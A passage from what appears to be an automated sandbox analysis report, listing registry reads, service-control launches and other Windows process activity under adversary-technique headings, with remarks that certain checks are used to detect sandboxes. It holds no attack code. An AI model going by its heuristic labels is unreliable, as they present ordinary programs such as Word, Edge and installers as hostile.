opened for modification C:\Windows\Installer\MSID98D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDAB7.tmp msiexec.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe -
Launches sc.exe 28 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5568 sc.exe 876 sc.exe 6076 sc.exe 5692 sc.exe 2756 sc.exe 2496 sc.exe 1716 sc.exe 5984 sc.exe 5868 sc.exe 5524 sc.exe 3256 sc.exe 796 sc.exe 720 sc.exe 3164 sc.exe 3580 sc.exe 3616 sc.exe 2340 sc.exe 4328 sc.exe 3644 sc.exe 4656 sc.exe 692 sc.exe 4564 sc.exe 3420 sc.exe 376 sc.exe 3092 sc.exe 2340 sc.exe 4140 sc.exe 4488 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5752 2724 WerFault.exe wmplayer.exe -
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
msiexec.exeDllHost.exeDllHost.exeMsiExec.exeDllHost.exeDllHost.exeDllHost.exeDllHost.exeDllHost.exeDllHost.exeDllHost.exeMsiExec.exeVirtualBox-7.0.22-165102-Win.exeDllHost.exeunregmp2.exeMsiExec.exeDllHost.exeDllHost.exeDllHost.exeDllHost.exewmplayer.exeMsiExec.exeDllHost.exeClassicShellSetup_4_3_1.exeDllHost.exeDllHost.exeDllHost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VirtualBox-7.0.22-165102-Win.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language unregmp2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmplayer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ClassicShellSetup_4_3_1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 5236 cmd.exe 6120 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Clipup.exeMsiExec.exeDrvInst.exeDrvInst.exeDrvInst.exetaskmgr.exesvchost.exevssvc.execlipup.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 Clipup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs Clipup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters MsiExec.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A MsiExec.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID Clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 clipup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEWINWORD.EXEexplorer.exetaskmgr.exeexplorer.exeONENOTE.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ONENOTE.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 ONENOTE.EXE -
Enumerates system info in registry 2 TTPs 33 IoCs
Processes:
msedge.exeWINWORD.EXEmsedge.exeWINWORD.EXEONENOTE.EXEmsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS ONENOTE.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies Control Panel 17 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\SizeWE rundll32.exe Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\SizeNS rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\Scheme Source = "0" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\Help rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\UpArrow rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\Hand rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\No rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\SizeAll rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\Arrow rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\AppStarting rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\Wait rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\NWPen rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\SizeNWSE rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\SizeNESW rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Desktop\UserPreferencesMask = 9e1e078012000000 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Cursors\ rundll32.exe -
Processes:
mspaint.exeexplorer.exemspaint.exemspaint.exeexplorer.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Software\Microsoft\Internet Explorer\Desktop\General mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Admin\\Downloads\\1920x1200_(Windows_10_versions_1507-1511).jpg" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Admin\\Downloads\\OIP.jpg" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Software\Microsoft\Internet Explorer\Desktop\General mspaint.exe Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Software\Microsoft\Internet Explorer\Desktop\General mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Admin\\Desktop\\Untitled.png" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
DrvInst.exeDrvInst.exeLogonUI.exeMsiExec.exeDrvInst.exemsiexec.exeLogonUI.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\25\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs 